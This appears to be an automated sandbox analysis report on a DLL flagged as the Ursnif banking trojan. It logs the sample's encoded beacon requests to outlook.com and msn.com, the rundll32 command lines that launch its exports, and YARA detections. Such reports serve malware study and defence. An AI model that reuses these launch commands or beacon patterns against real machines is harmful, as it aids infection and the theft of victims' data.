                                                                                                                        2021-10-11 22:38:46 UTC5INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c
                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - Fil


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        5192.168.2.44980940.97.153.146443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        2021-10-11 22:38:53 UTC7OUTGET /signup/liopolo/rNcthdwaMuA/zHzDKpXzKq0_2F/hgSdOtaWvkDNGgYpqBLqh/fnirw5AL03xUm4gv/1SKDwhrC85cQhDG/iqhTJ3hi9wsaeKx0vI/xO4E5YLZP/YP9uSugvYABSkowPk9S_/2B24KB1lGZ7pVE71wAB/PNLOy1DTAkJRmo3faOVpWQ/D9BP51I5FAmCi/mjxkDJSf_2B0/dO3cuvbU.jre HTTP/1.1
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Pragma: no-cache
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                        Host: outlook.com
                                                                                                                        2021-10-11 22:38:53 UTC7INHTTP/1.1 301 Moved Permanently
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Pragma: no-cache
                                                                                                                        Location: https://www.outlook.com/signup/liopolo/rNcthdwaMuA/zHzDKpXzKq0_2F/hgSdOtaWvkDNGgYpqBLqh/fnirw5AL03xUm4gv/1SKDwhrC85cQhDG/iqhTJ3hi9wsaeKx0vI/xO4E5YLZP/YP9uSugvYABSkowPk9S_/2B24KB1lGZ7pVE71wAB/PNLOy1DTAkJRmo3faOVpWQ/D9BP51I5FAmCi/mjxkDJSf_2B0/dO3cuvbU.jre
                                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                                        request-id: 556c818d-51ec-ad8d-c23c-618ef38fd56c
                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                        X-FEServer: BN6PR2001CA0003
                                                                                                                        X-RequestId: d6343e44-52af-49e0-aabf-9bf1bd538048
                                                                                                                        MS-CV: jYFsVexRja3CPGGO84/VbA.0
                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                        X-FEServer: BN6PR2001CA0003
                                                                                                                        Date: Mon, 11 Oct 2021 22:38:52 GMT
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        6192.168.2.44981052.97.218.66443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        2021-10-11 22:38:53 UTC8OUTGET /signup/liopolo/rNcthdwaMuA/zHzDKpXzKq0_2F/hgSdOtaWvkDNGgYpqBLqh/fnirw5AL03xUm4gv/1SKDwhrC85cQhDG/iqhTJ3hi9wsaeKx0vI/xO4E5YLZP/YP9uSugvYABSkowPk9S_/2B24KB1lGZ7pVE71wAB/PNLOy1DTAkJRmo3faOVpWQ/D9BP51I5FAmCi/mjxkDJSf_2B0/dO3cuvbU.jre HTTP/1.1
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Pragma: no-cache
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                        Host: www.outlook.com
                                                                                                                        2021-10-11 22:38:53 UTC8INHTTP/1.1 301 Moved Permanently
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Pragma: no-cache
                                                                                                                        Location: https://outlook.office365.com/signup/liopolo/rNcthdwaMuA/zHzDKpXzKq0_2F/hgSdOtaWvkDNGgYpqBLqh/fnirw5AL03xUm4gv/1SKDwhrC85cQhDG/iqhTJ3hi9wsaeKx0vI/xO4E5YLZP/YP9uSugvYABSkowPk9S_/2B24KB1lGZ7pVE71wAB/PNLOy1DTAkJRmo3faOVpWQ/D9BP51I5FAmCi/mjxkDJSf_2B0/dO3cuvbU.jre
                                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                                        request-id: fa41d79f-b084-e275-06fd-7c804baa2baf
                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                        X-FEServer: AS8PR04CA0017
                                                                                                                        X-RequestId: 5790813c-b01e-46a4-ac89-6c67c15fc018
                                                                                                                        MS-CV: n9dB+oSwdeIG/XyAS6orrw.0
                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                        X-FEServer: AS8PR04CA0017
                                                                                                                        Date: Mon, 11 Oct 2021 22:38:52 GMT
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        7192.168.2.44981152.97.137.210443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        2021-10-11 22:38:53 UTC9OUTGET /signup/liopolo/rNcthdwaMuA/zHzDKpXzKq0_2F/hgSdOtaWvkDNGgYpqBLqh/fnirw5AL03xUm4gv/1SKDwhrC85cQhDG/iqhTJ3hi9wsaeKx0vI/xO4E5YLZP/YP9uSugvYABSkowPk9S_/2B24KB1lGZ7pVE71wAB/PNLOy1DTAkJRmo3faOVpWQ/D9BP51I5FAmCi/mjxkDJSf_2B0/dO3cuvbU.jre HTTP/1.1
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Pragma: no-cache
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                        Host: outlook.office365.com
                                                                                                                        2021-10-11 22:38:53 UTC9INHTTP/1.1 404 Not Found
                                                                                                                        Content-Length: 1245
                                                                                                                        Content-Type: text/html
                                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                                        request-id: 463ae588-6705-a5a4-dc70-c20dde540b89
                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                        X-CalculatedFETarget: HE1PR0202CU001.internal.outlook.com
                                                                                                                        X-BackEndHttpStatus: 404
                                                                                                                        X-FEProxyInfo: HE1PR0202CA0016.EURPRD02.PROD.OUTLOOK.COM
                                                                                                                        X-CalculatedBETarget: HE1P194MB0201.EURP194.PROD.OUTLOOK.COM
                                                                                                                        X-BackEndHttpStatus: 404
                                                                                                                        X-RUM-Validated: 1
                                                                                                                        X-Proxy-RoutingCorrectness: 1
                                                                                                                        X-Proxy-BackendServerStatus: 404
                                                                                                                        MS-CV: iOU6RgVnpKXccMIN3lQLiQ.1.1
                                                                                                                        X-FEServer: HE1PR0202CA0016
                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                        X-FEServer: AM6P194CA0062
                                                                                                                        Date: Mon, 11 Oct 2021 22:38:53 GMT
                                                                                                                        Connection: close
                                                                                                                        2021-10-11 22:38:53 UTC10INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c
                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - Fil


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        8192.168.2.44982713.82.28.61443C:\Windows\System32\loaddll32.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        2021-10-11 22:39:27 UTC11OUTGET /mail/liopolo/5hHdOh6aVGIiN/xm3v7_2B/EkShunhzAo7MsZ9CmkqFWtX/3z_2Bns4ON/91CWMsZkh9K0L_2FK/DGWBtSEwajEJ/0TtpREbudd5/QgJK102N2T9j48/a7_2B8h2NmEQ_2FO6HINr/eS5x2dWmrnxEuUas/E6VYZyoESNredc4/JUFmKkMiSye_2BBKeH/JexZCfmhU/vSKjW_2B8KOY/RYzBQt1.jre HTTP/1.1
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Pragma: no-cache
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                        Host: msn.com
                                                                                                                        2021-10-11 22:39:27 UTC12INHTTP/1.1 301 Moved Permanently
                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                        Location: https://www.msn.com/mail/liopolo/5hHdOh6aVGIiN/xm3v7_2B/EkShunhzAo7MsZ9CmkqFWtX/3z_2Bns4ON/91CWMsZkh9K0L_2FK/DGWBtSEwajEJ/0TtpREbudd5/QgJK102N2T9j48/a7_2B8h2NmEQ_2FO6HINr/eS5x2dWmrnxEuUas/E6VYZyoESNredc4/JUFmKkMiSye_2BBKeH/JexZCfmhU/vSKjW_2B8KOY/RYzBQt1.jre
                                                                                                                        Server: Microsoft-IIS/8.5
                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                        Date: Mon, 11 Oct 2021 22:39:26 GMT
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 380
                                                                                                                        2021-10-11 22:39:27 UTC12INData Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 73 6e 2e 63 6f 6d 2f 6d 61 69 6c 2f 6c 69 6f 70 6f 6c 6f 2f 35 68 48 64 4f 68 36 61 56 47 49 69 4e 2f 78 6d 33 76 37 5f 32 42 2f 45 6b 53 68 75 6e 68 7a 41 6f 37 4d 73 5a 39 43 6d 6b 71 46 57 74 58 2f 33 7a 5f 32 42 6e 73 34 4f 4e 2f 39 31 43 57 4d 73 5a 6b 68 39 4b 30 4c 5f 32 46 4b 2f 44 47 57 42 74 53 45 77 61 6a 45 4a 2f 30 54 74 70 52 45 62 75 64 64 35 2f 51 67 4a 4b 31 30 32 4e 32 54 39 6a 34 38 2f
                                                                                                                        Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://www.msn.com/mail/liopolo/5hHdOh6aVGIiN/xm3v7_2B/EkShunhzAo7MsZ9CmkqFWtX/3z_2Bns4ON/91CWMsZkh9K0L_2FK/DGWBtSEwajEJ/0TtpREbudd5/QgJK102N2T9j48/


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        9192.168.2.44982913.82.28.61443C:\Windows\System32\loaddll32.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        2021-10-11 22:39:34 UTC12OUTGET /mail/liopolo/QoeEw7znNY9KuZLPv/PhlDvAFg0Bnn/nVx6DnTynJS/Jqe2AOjRD8vYJs/PuqBLIn3Zd37OXyJlwD7Q/FiLhjKnVW_2ByswX/LXphFosRYtREZOL/Q6wDOp8ES889SSlI1S/AFbHRrWLn/_2F7R_2FVhgDELEonTCy/KSLPzpnW0YF_2FoB4Xy/kHR_2F88KI6KqxU9hJvbKE/it_2FLM35/c.jre HTTP/1.1
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Pragma: no-cache
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                        Host: msn.com
                                                                                                                        2021-10-11 22:39:34 UTC13INHTTP/1.1 301 Moved Permanently
                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                        Location: https://www.msn.com/mail/liopolo/QoeEw7znNY9KuZLPv/PhlDvAFg0Bnn/nVx6DnTynJS/Jqe2AOjRD8vYJs/PuqBLIn3Zd37OXyJlwD7Q/FiLhjKnVW_2ByswX/LXphFosRYtREZOL/Q6wDOp8ES889SSlI1S/AFbHRrWLn/_2F7R_2FVhgDELEonTCy/KSLPzpnW0YF_2FoB4Xy/kHR_2F88KI6KqxU9hJvbKE/it_2FLM35/c.jre
                                                                                                                        Server: Microsoft-IIS/8.5
                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                        Date: Mon, 11 Oct 2021 22:39:33 GMT
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 377
                                                                                                                        2021-10-11 22:39:34 UTC13INData Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 73 6e 2e 63 6f 6d 2f 6d 61 69 6c 2f 6c 69 6f 70 6f 6c 6f 2f 51 6f 65 45 77 37 7a 6e 4e 59 39 4b 75 5a 4c 50 76 2f 50 68 6c 44 76 41 46 67 30 42 6e 6e 2f 6e 56 78 36 44 6e 54 79 6e 4a 53 2f 4a 71 65 32 41 4f 6a 52 44 38 76 59 4a 73 2f 50 75 71 42 4c 49 6e 33 5a 64 33 37 4f 58 79 4a 6c 77 44 37 51 2f 46 69 4c 68 6a 4b 6e 56 57 5f 32 42 79 73 77 58 2f 4c 58 70 68 46 6f 73 52 59 74 52 45 5a 4f 4c 2f 51 36 77
                                                                                                                        Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://www.msn.com/mail/liopolo/QoeEw7znNY9KuZLPv/PhlDvAFg0Bnn/nVx6DnTynJS/Jqe2AOjRD8vYJs/PuqBLIn3Zd37OXyJlwD7Q/FiLhjKnVW_2ByswX/LXphFosRYtREZOL/Q6w


                                                                                                                        Code Manipulations

                                                                                                                        Statistics

                                                                                                                        CPU Usage

                                                                                                                        Click to jump to process

                                                                                                                        Memory Usage

                                                                                                                        Click to jump to process

                                                                                                                        High Level Behavior Distribution

                                                                                                                        Click to dive into process behavior distribution

                                                                                                                        Behavior

                                                                                                                        Click to jump to process

                                                                                                                        System Behavior

                                                                                                                        Analysis Process: loaddll32.exe PID: 7036 Parent PID: 5284

                                                                                                                        General

                                                                                                                        Start time:00:36:03
                                                                                                                        Start date:12/10/2021
                                                                                                                        Path:C:\Windows\System32\loaddll32.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:loaddll32.exe 'C:\Users\user\Desktop\616412739e268.dll'
                                                                                                                        Imagebase:0xd40000
                                                                                                                        File size:893440 bytes
                                                                                                                        MD5 hash:72FCD8FB0ADC38ED9050569AD673650E
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.916793229.0000000003BB8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.916426520.0000000003BB8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.916847995.0000000003BB8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.916379765.0000000003BB8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.1049081119.000000000383F000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.916579363.0000000003BB8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.960454814.0000000003A3B000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.917263832.0000000003BB8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.1185910848.00000000037C0000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.916716758.0000000003BB8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000003.859623257.0000000001390000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.916652805.0000000003BB8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.1006058312.000000000393D000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.916501324.0000000003BB8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.1185750269.0000000003559000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        Reputation:moderate

                                                                                                                        Chronological Activities

                                                                                                                        Analysis Process: cmd.exe PID: 7040 Parent PID: 7036

                                                                                                                        General

                                                                                                                        Start time:00:36:04
                                                                                                                        Start date:12/10/2021
                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1
                                                                                                                        Imagebase:0x11d0000
                                                                                                                        File size:232960 bytes
                                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high

                                                                                                                        Chronological Activities

                                                                                                                        Analysis Process: rundll32.exe PID: 7072 Parent PID: 7036

                                                                                                                        General

                                                                                                                        Start time:00:36:04
                                                                                                                        Start date:12/10/2021
                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:rundll32.exe C:\Users\user\Desktop\616412739e268.dll,BeGrass
                                                                                                                        Imagebase:0x910000
                                                                                                                        File size:61952 bytes
                                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.815784536.0000000003220000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        Reputation:high

                                                                                                                        Chronological Activities

                                                                                                                        Analysis Process: rundll32.exe PID: 7052 Parent PID: 7040

                                                                                                                        General

                                                                                                                        Start time:00:36:04
                                                                                                                        Start date:12/10/2021
                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1
                                                                                                                        Imagebase:0x910000
                                                                                                                        File size:61952 bytes
                                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.974874720.000000000573B000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000002.1187092392.00000000054C0000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.930983342.00000000058B8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.930624015.00000000058B8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.1020193164.000000000563D000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.930910657.00000000058B8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.931064048.00000000058B8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000003.817641494.0000000003420000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.930863354.00000000058B8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.1063376109.000000000553F000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.931519942.00000000058B8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.931136929.00000000058B8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.930715901.00000000058B8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.1186977706.0000000005229000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.930775995.00000000058B8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        Reputation:high

                                                                                                                        Chronological Activities

                                                                                                                        Analysis Process: rundll32.exe PID: 1364 Parent PID: 7036

                                                                                                                        General

                                                                                                                        Start time:00:36:09
                                                                                                                        Start date:12/10/2021
                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:rundll32.exe C:\Users\user\Desktop\616412739e268.dll,Fieldeight
                                                                                                                        Imagebase:0x910000
                                                                                                                        File size:61952 bytes
                                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000004.00000003.843034391.00000000008A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        Reputation:high

                                                                                                                        Chronological Activities

                                                                                                                        Analysis Process: rundll32.exe PID: 6464 Parent PID: 7036

                                                                                                                        General

                                                                                                                        Start time:00:36:17
                                                                                                                        Start date:12/10/2021
                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:rundll32.exe C:\Users\user\Desktop\616412739e268.dll,Often
                                                                                                                        Imagebase:0x910000
                                                                                                                        File size:61952 bytes
                                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000005.00000003.855981301.0000000002EC0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000005.00000003.888775678.0000000004D09000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        Reputation:high

                                                                                                                        Chronological Activities

                                                                                                                        Analysis Process: WerFault.exe PID: 6452 Parent PID: 7072

                                                                                                                        General

                                                                                                                        Start time:00:37:46
                                                                                                                        Start date:12/10/2021
                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7072 -s 636
                                                                                                                        Imagebase:0x10e0000
                                                                                                                        File size:434592 bytes
                                                                                                                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                        Chronological Activities

                                                                                                                        Analysis Process: WerFault.exe PID: 6824 Parent PID: 1364

                                                                                                                        General

                                                                                                                        Start time:00:37:51
                                                                                                                        Start date:12/10/2021
                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1364 -s 644
                                                                                                                        Imagebase:0x10e0000
                                                                                                                        File size:434592 bytes
                                                                                                                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                        Chronological Activities

                                                                                                                        Analysis Process: WerFault.exe PID: 6368 Parent PID: 6464

                                                                                                                        General

                                                                                                                        Start time:00:37:56
                                                                                                                        Start date:12/10/2021
                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6464 -s 632
                                                                                                                        Imagebase:0x10e0000
                                                                                                                        File size:434592 bytes
                                                                                                                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                        Chronological Activities

                                                                                                                        Disassembly

                                                                                                                        Code Analysis

                                                                                                                        Reset < >

                                                                                                                          Analysis Process: loaddll32.exe PID: 7036 Parent PID: 5284 loaddll32.exeCOMMON

                                                                                                                          Executed Functions
